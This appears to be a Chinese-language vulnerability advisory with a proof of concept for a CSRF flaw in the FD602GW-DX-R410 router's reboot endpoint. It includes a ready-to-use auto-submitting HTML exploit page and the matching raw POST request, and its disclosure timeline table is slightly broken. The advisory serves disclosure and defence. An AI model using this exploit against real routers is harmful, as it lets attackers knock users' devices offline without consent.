FD602GW-DX-R410 光纤路由器管理界面(固件版本 V2.2.14)中跨站请求伪造(CSRF)漏洞的概念验证与安全公告。本公告概述了影响、攻击向量及修复建议。
FD602GW-DX-R410 路由器中的 CSRF 漏洞允许远程攻击者在管理员已认证的情况下,通过向 /boaform/admin/formReboot 发送精心构造的 POST 请求重启设备。
在 FD602GW-DX-R410 光纤路由器的基于 Web 的管理控制台(固件版本 V2.2.14)中发现了一个跨站请求伪造(CSRF)漏洞。/boaform/admin/formReboot 端点接受 POST 请求,无需 CSRF 令牌或来源验证即可触发设备完全重启。如果经过身份验证的管理员访问恶意页面,路由器可能会在未经同意的情况下被远程重启。
/boaform/admin/formReboot<html>
<!-- CSRF PoC - generated by Burp Suite Pro -->
<body>
<form action="http://192.168.1.1/boaform/admin/formReboot" method="POST">
<input type="hidden" name="postSecurityFlag" value="+65535" />
<input type="submit" value="Submit" />
</form>
<script>
history.pushState('', '', '/');
document.forms[0].submit();
</script>
</body>
</html>
POST /boaform/admin/formReboot HTTP/1.1
Host: 192.168.1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 23
postSecurityFlag=+65535
HTTP 200 OK;路由器立即重启。
| 日期 | 行动 |
|---|---|
| 2025年6月 | 发现漏洞 |
| 2025年6月 | 尝试负责任披露(未获回复) |
| 2025年7月 | 向 MITRE 请求 CVE ID |
| 2025年7月 | 公告准备完成,等待发布 |
| 2025年9月 |
本公告仅供教育和安全意识之用。作者对滥用不承担任何责任。所有测试均在受控环境中进行。
| CVE 分配,公告公开 |